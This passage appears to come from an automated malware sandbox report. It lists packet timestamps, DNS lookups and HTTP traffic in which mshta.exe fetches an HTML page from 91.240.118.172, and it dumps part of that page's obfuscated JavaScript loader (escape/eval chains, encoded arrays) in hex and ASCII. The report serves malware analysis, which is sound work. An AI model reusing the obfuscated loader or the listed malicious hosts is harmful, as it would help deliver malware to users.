                                                                                                                  Jan 28, 2022 21:02:01.809765100 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809799910 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809812069 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809825897 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809842110 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809871912 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809887886 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809904099 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809921026 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809932947 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809945107 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809962034 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.809972048 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.809998035 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810003042 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810019016 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810034990 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810050964 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810055971 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810066938 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810081959 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810087919 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810120106 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810215950 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810231924 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810247898 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810262918 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810269117 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810277939 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810292006 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810293913 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810308933 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810324907 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810328960 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810342073 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810358047 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810359955 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810374022 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810389042 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810390949 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810403109 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810419083 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.810421944 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.810452938 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989140034 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989166021 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989183903 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989201069 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989223957 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989242077 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989259958 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989259005 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989275932 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989279985 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989291906 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989306927 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989306927 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989322901 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989337921 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989352942 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989355087 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989368916 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989383936 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989398956 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989399910 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989413977 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989428043 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989443064 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989444017 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989459991 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989459991 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989475012 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989490032 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989491940 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989506006 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989521980 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989522934 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989537954 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989552975 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989567995 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989573002 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989583969 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989598989 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989615917 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989615917 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989630938 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989648104 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989661932 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989662886 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989676952 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989692926 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989830017 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.168822050 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168853998 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168865919 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168879032 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168895960 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168912888 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168927908 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168945074 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168956041 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168972969 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168989897 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168991089 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169006109 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169013023 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169023037 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169023037 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169039011 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169054985 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169070959 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169073105 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169086933 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169102907 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169117928 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169120073 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169133902 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169150114 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169164896 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169167995 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169181108 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169197083 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169198990 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169215918 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169231892 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169248104 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169250965 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169262886 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169279099 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169294119 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169296026 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169344902 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169361115 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169377089 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169378996 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169392109 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169406891 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169413090 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169423103 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169440031 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348356962 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348417997 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348448038 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348479986 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348517895 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348547935 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348556995 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348593950 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348608017 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348633051 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348671913 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348709106 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348718882 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348747969 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348786116 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348820925 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348831892 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348859072 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348895073 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348936081 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348938942 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348975897 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349014044 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349052906 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349057913 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.349091053 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349127054 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349164963 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349170923 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.349203110 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349241018 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349278927 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349282026 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.349314928 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349343061 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.349351883 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349390030 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349421024 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349431992 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.621922970 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:07.171586990 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:07.171777010 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:43.744826078 CET804916891.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:43.745651960 CET4916880192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:03:18.804837942 CET4916880192.168.2.2291.240.118.172
                                                                                                                  Jan 28, 2022 21:03:18.866116047 CET804916891.240.118.172192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:22.814089060 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.116945028 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.117048025 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.207600117 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.510454893 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.527287006 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.527343988 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.527631998 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.545066118 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:23.850617886 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:23.850884914 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:35.192365885 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:35.537266970 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:36.355695009 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:36.358089924 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:39.355885029 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:39.355911970 CET8049172160.16.102.168192.168.2.22
                                                                                                                  Jan 28, 2022 21:03:39.355977058 CET4917280192.168.2.22160.16.102.168
                                                                                                                  Jan 28, 2022 21:03:39.356019020 CET4917280192.168.2.22160.16.102.168

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 28, 2022 21:01:38.788352966 CET5216753192.168.2.228.8.8.8
                                                                                                                  Jan 28, 2022 21:01:38.832066059 CET53521678.8.8.8192.168.2.22
                                                                                                                  Jan 28, 2022 21:01:59.982759953 CET5059153192.168.2.228.8.8.8
                                                                                                                  Jan 28, 2022 21:02:00.001409054 CET53505918.8.8.8192.168.2.22

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                  Jan 28, 2022 21:01:38.788352966 CET192.168.2.228.8.8.80x77a6Standard query (0)hostfeeling.comA (IP address)IN (0x0001)
                                                                                                                  Jan 28, 2022 21:01:59.982759953 CET192.168.2.228.8.8.80xf0b3Standard query (0)jurnalpjf.lan.go.idA (IP address)IN (0x0001)

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                  Jan 28, 2022 21:01:38.832066059 CET8.8.8.8192.168.2.220x77a6No error (0)hostfeeling.com164.90.147.135A (IP address)IN (0x0001)
                                                                                                                  Jan 28, 2022 21:02:00.001409054 CET8.8.8.8192.168.2.220xf0b3No error (0)jurnalpjf.lan.go.id103.206.244.105A (IP address)IN (0x0001)

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • 91.240.118.172
                                                                                                                  • jurnalpjf.lan.go.id

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.224916791.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jan 28, 2022 21:01:33.881614923 CET0OUTGET /gg/ff/fe.html HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Accept-Language: en-US
                                                                                                                  UA-CPU: AMD64
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                  Host: 91.240.118.172
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 28, 2022 21:01:33.943207026 CET2INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.20.2
                                                                                                                  Date: Fri, 28 Jan 2022 20:01:33 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 32 62 32 65 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 5b 30 5d 3d 27 25 36 44 5c 31 37 30 25 33 38 25 33 38 25 33 33 25 33 34 25 33 34 25 34 31 27 20 20 20 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7d 0c 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 19 7f 36 7f 31 7f 79 7f 25 7f 33 7f 37 7d 24 7f 44 7d 1d 7d 26 7f 32 7d 26 7f 33 7f 42 7d 20 7f 31 7d 19 7f 37 7f 31 7d 24 7f 38 7d 5c 27 7d 19 7f 32 7f 33 7f 25 7f 37 7f 34 7d 06 7d 19 7f 35 7f 36 7f 25 7f 36 7d 2a 7f 45 7f 66 7d 20 7f 32 7d 3e 7f 37 7f 6d 7f 43 7f 68 7d 41 7f 31 7f 72 7f 25 7f 34 7f 33 7d 48 7d 19 7f 34 7f 34 7f 65 7d 1d 7d 35 7f 33 7d 33 7f 33 7d 39 7f 32 7f 43 7d 24 7d 5b 7f 30 7d 1d 7f 39 7d 24 7f 42 7d 45 7f 31 7f 35 7f 37 7d 4f 7f 32 7d 35 7f 36 7d 64 7f 33 7d 28 7f 33 7d 62 7d 2d 7f 69 7d 24 7d 5f 7f
                                                                                                                  Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_
                                                                                                                  Jan 28, 2022 21:01:33.943257093 CET3INData Raw: 33 7d 1c 7d 5a 7d 24 7d 2c 7d 6f 7f 42 7d 41 7d 64 7f 32 7d 7e 7c 01 7d 63 7d 3a 7d 2e 7d 1a 7d 30 7f 31 7d 32 7d 7b 7d 1d 7d 7e 7d 70 7f 71 7d 31 7d 5b 7d 35 7f 37 7d 71 7d 7e 7f 36 7d 40 7f 37 7f 35 7d 3e 7f 36 7f 63 7d 3a 7f 34 7f 69 7d 48 7d
